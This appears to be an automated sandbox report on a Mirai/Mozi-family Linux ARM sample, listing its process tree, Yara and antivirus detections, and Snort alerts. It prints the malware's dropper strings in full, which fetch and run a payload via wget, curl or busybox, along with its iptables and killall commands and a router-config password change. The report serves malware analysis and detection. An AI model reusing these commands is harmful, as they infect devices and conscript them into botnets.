Loading ...

Play interactive tourEdit tour

Analysis Report rIbyGX66Op

Overview

General Information

Sample Name:rIbyGX66Op
Analysis ID:397469
MD5:eec5c6c219535fba3a0492ea8118b397
SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Yara detected Mirai
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
HTTP GET or POST without a user agent
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Classification

Startup

  • system is lnxubuntu1
  • rIbyGX66Op (PID: 4559, Parent: 4498, MD5: eec5c6c219535fba3a0492ea8118b397) Arguments: /usr/bin/qemu-arm /tmp/rIbyGX66Op
    • rIbyGX66Op New Fork (PID: 4576, Parent: 4559)
      • rIbyGX66Op New Fork (PID: 4578, Parent: 4576)
        • sh (PID: 4580, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
          • sh New Fork (PID: 4582, Parent: 4580)
          • killall (PID: 4582, Parent: 4580, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd utelnetd scfgmgr
        • rIbyGX66Op New Fork (PID: 4601, Parent: 4578)
          • sh (PID: 4614, Parent: 4601, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT"
            • sh New Fork (PID: 4616, Parent: 4614)
            • iptables (PID: 4616, Parent: 4614, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT
              • iptables New Fork (PID: 4622, Parent: 4616)
              • modprobe (PID: 4622, Parent: 4616, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables
          • sh (PID: 4648, Parent: 4601, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT"
            • sh New Fork (PID: 4650, Parent: 4648)
            • iptables (PID: 4650, Parent: 4648, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT
          • sh (PID: 4651, Parent: 4601, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT"
            • sh New Fork (PID: 4653, Parent: 4651)
            • iptables (PID: 4653, Parent: 4651, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT
          • sh (PID: 4682, Parent: 4601, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT"
            • sh New Fork (PID: 4690, Parent: 4682)
            • iptables (PID: 4690, Parent: 4682, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT
          • sh (PID: 4708, Parent: 4601, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 54753 -j ACCEPT"
            • sh New Fork (PID: 4716, Parent: 4708)
            • iptables (PID: 4716, Parent: 4708, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 54753 -j ACCEPT
          • sh (PID: 4732, Parent: 4601, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 54753 -j ACCEPT"
            • sh New Fork (PID: 4736, Parent: 4732)
            • iptables (PID: 4736, Parent: 4732, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 54753 -j ACCEPT
          • sh (PID: 4737, Parent: 4601, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 54753 -j ACCEPT"
            • sh New Fork (PID: 4739, Parent: 4737)
            • iptables (PID: 4739, Parent: 4737, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 54753 -j ACCEPT
          • sh (PID: 4741, Parent: 4601, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 54753 -j ACCEPT"
            • sh New Fork (PID: 4748, Parent: 4741)
            • iptables (PID: 4748, Parent: 4741, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 54753 -j ACCEPT
        • sh (PID: 4791, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
          • sh New Fork (PID: 4793, Parent: 4791)
          • iptables (PID: 4793, Parent: 4791, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        • sh (PID: 4794, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
          • sh New Fork (PID: 4796, Parent: 4794)
          • iptables (PID: 4796, Parent: 4794, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        • sh (PID: 4799, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
          • sh New Fork (PID: 4805, Parent: 4799)
          • iptables (PID: 4805, Parent: 4799, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP
        • sh (PID: 4821, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
          • sh New Fork (PID: 4829, Parent: 4821)
          • iptables (PID: 4829, Parent: 4821, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        • sh (PID: 4845, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
        • sh (PID: 4857, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
        • sh (PID: 4868, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
          • sh New Fork (PID: 4878, Parent: 4868)
          • iptables (PID: 4878, Parent: 4868, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        • sh (PID: 4897, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
          • sh New Fork (PID: 4906, Parent: 4897)
          • iptables (PID: 4906, Parent: 4897, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        • sh (PID: 4921, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
          • sh New Fork (PID: 4926, Parent: 4921)
          • iptables (PID: 4926, Parent: 4921, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        • sh (PID: 4928, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
          • sh New Fork (PID: 4931, Parent: 4928)
          • iptables (PID: 4931, Parent: 4928, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        • sh (PID: 4937, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
          • sh New Fork (PID: 4947, Parent: 4937)
          • iptables (PID: 4947, Parent: 4937, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        • sh (PID: 4966, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
          • sh New Fork (PID: 4974, Parent: 4966)
          • iptables (PID: 4974, Parent: 4966, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        • sh (PID: 4991, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
          • sh New Fork (PID: 5000, Parent: 4991)
          • iptables (PID: 5000, Parent: 4991, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP
        • sh (PID: 5017, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
          • sh New Fork (PID: 5021, Parent: 5017)
          • iptables (PID: 5021, Parent: 5017, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP
        • sh (PID: 5023, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
          • sh New Fork (PID: 5025, Parent: 5023)
          • iptables (PID: 5025, Parent: 5023, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        • sh (PID: 5028, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
          • sh New Fork (PID: 5034, Parent: 5028)
          • iptables (PID: 5034, Parent: 5028, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        • sh (PID: 5049, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
          • sh New Fork (PID: 5057, Parent: 5049)
          • iptables (PID: 5057, Parent: 5049, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP
        • sh (PID: 5077, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
          • sh New Fork (PID: 5087, Parent: 5077)
          • iptables (PID: 5087, Parent: 5077, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        • sh (PID: 5115, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT"
          • sh New Fork (PID: 5117, Parent: 5115)
          • iptables (PID: 5117, Parent: 5115, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT
        • sh (PID: 5118, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 8000 -j ACCEPT"
          • sh New Fork (PID: 5120, Parent: 5118)
          • iptables (PID: 5120, Parent: 5118, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --source-port 8000 -j ACCEPT
        • sh (PID: 5122, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT"
          • sh New Fork (PID: 5127, Parent: 5122)
          • iptables (PID: 5127, Parent: 5122, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT
        • sh (PID: 5142, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8000 -j ACCEPT"
          • sh New Fork (PID: 5152, Parent: 5142)
          • iptables (PID: 5152, Parent: 5142, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 8000 -j ACCEPT
        • sh (PID: 5173, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 8000 -j ACCEPT"
          • sh New Fork (PID: 5182, Parent: 5173)
          • iptables (PID: 5182, Parent: 5173, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --dport 8000 -j ACCEPT
        • sh (PID: 5200, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 8000 -j ACCEPT"
          • sh New Fork (PID: 5210, Parent: 5200)
          • iptables (PID: 5210, Parent: 5200, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --sport 8000 -j ACCEPT
        • sh (PID: 5228, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT"
          • sh New Fork (PID: 5231, Parent: 5228)
          • iptables (PID: 5231, Parent: 5228, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT
        • sh (PID: 5232, Parent: 4578, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8000 -j ACCEPT"
          • sh New Fork (PID: 5234, Parent: 5232)
          • iptables (PID: 5234, Parent: 5232, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 8000 -j ACCEPT
  • upstart New Fork (PID: 5271, Parent: 3310)
  • sh (PID: 5271, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 5272, Parent: 5271)
    • date (PID: 5272, Parent: 5271, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 5274, Parent: 5271)
    • apport-checkreports (PID: 5274, Parent: 5271, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 5298, Parent: 3310)
  • sh (PID: 5298, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 5299, Parent: 5298)
    • date (PID: 5299, Parent: 5298, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 5310, Parent: 5298)
    • apport-gtk (PID: 5310, Parent: 5298, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 5325, Parent: 3310)
  • sh (PID: 5325, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 5331, Parent: 5325)
    • date (PID: 5331, Parent: 5325, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 5335, Parent: 5325)
    • apport-gtk (PID: 5335, Parent: 5325, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
rIbyGX66OpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
rIbyGX66OpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    rIbyGX66OpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      rIbyGX66OpJoeSecurity_Mirai_4Yara detected MiraiJoe Security

        PCAP (Network Traffic)

        SourceRuleDescriptionAuthorStrings
        dump.pcapJoeSecurity_Mirai_4Yara detected MiraiJoe Security

          Dropped Files

          SourceRuleDescriptionAuthorStrings
          /usr/networksSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
          • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
          /usr/networksJoeSecurity_Mirai_8Yara detected MiraiJoe Security
            /usr/networksJoeSecurity_Mirai_9Yara detected MiraiJoe Security
              /usr/networksJoeSecurity_Mirai_4Yara detected MiraiJoe Security

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus / Scanner detection for submitted sampleShow sources
                Source: rIbyGX66OpAvira: detected
                Antivirus detection for dropped fileShow sources
                Source: /usr/networksAvira: detection malicious, Label: LINUX/Mirai.lldau
                Multi AV Scanner detection for submitted fileShow sources
                Source: rIbyGX66OpVirustotal: Detection: 68%Perma Link
                Source: rIbyGX66OpMetadefender: Detection: 51%Perma Link
                Source: rIbyGX66OpReversingLabs: Detection: 68%

                Spreading:

                barindex
                Found strings indicative of a multi-platform dropperShow sources
                Source: rIbyGX66OpString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Source: rIbyGX66OpString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                Source: rIbyGX66OpString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Opens /proc/net/* files useful for finding connected devices and routersShow sources
                Source: /tmp/rIbyGX66Op (PID: 4601)Opens: /proc/net/route
                Source: /tmp/rIbyGX66Op (PID: 4601)Opens: /proc/net/route

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.77.238.132: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.97.247.73: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.190.22.139: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 122.228.249.221: -> 192.168.2.20:
                Source: TrafficSnort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43610
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.151.146.9: -> 192.168.2.20:
                Source: TrafficSnort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43620
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 95.211.103.19: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.208.167.77: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.76.41.4: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.16.5.51: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 121.127.240.171: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 2.244.147.91: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.66.240.0: -> 192.168.2.20:
                Source: TrafficSnort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43626
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.97.251.124: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.11.12.82: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 149.56.185.133: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.12.212.10: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:36484 -> 34.90.159.216:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:36484 -> 34.90.159.216:80
                Source: TrafficSnort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43664
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 31.150.220.105: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 67.143.229.1: -> 192.168.2.20:
                Source: TrafficSnort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43914
                Source: TrafficSnort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43922
                Source: TrafficSnort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43936
                Source: TrafficSnort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43938
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 45.66.122.140: -> 192.168.2.20:
                Source: TrafficSnort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43974
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.44.132.119: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.66.229.122: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 184.105.35.86: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 187.9.231.26: -> 192.168.2.20:
                Source: TrafficSnort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44216
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 193.168.227.106: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 2.204.138.252: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.77.64.1: -> 192.168.2.20:
                Source: TrafficSnort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44220
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 193.203.134.203: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 63.143.96.217:8000 -> 192.168.2.20:8000
                Source: TrafficSnort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44244
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.224.12.236: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 197.13.3.22: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.44.112.190: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.83.146:58148 -> 192.168.2.20:8000
                Source: TrafficSnort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44250
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 218.86.84.189:1111 -> 192.168.2.20:8000
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 209.51.191.242: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.17.32.41: -> 192.168.2.20:
                Source: TrafficSnort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44512
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 84.17.32.179: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 115.114.112.90: -> 192.168.2.20:
                Source: TrafficSnort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44532
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.23.128:22104 -> 192.168.2.20:8000
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.59.151.184: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.242.148.249: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 119.253.14.61: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 151.177.190.108:4000 -> 192.168.2.20:8000
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 116.68.110.71:16802 -> 192.168.2.20:8000
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 180.188.242.113:58745 -> 192.168.2.20:8000
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.244.59.137: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 78.35.102.107: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 78.133.138.166: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 47.104.191.32:4748 -> 192.168.2.20:8000
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.217.98.171: -> 192.168.2.20:
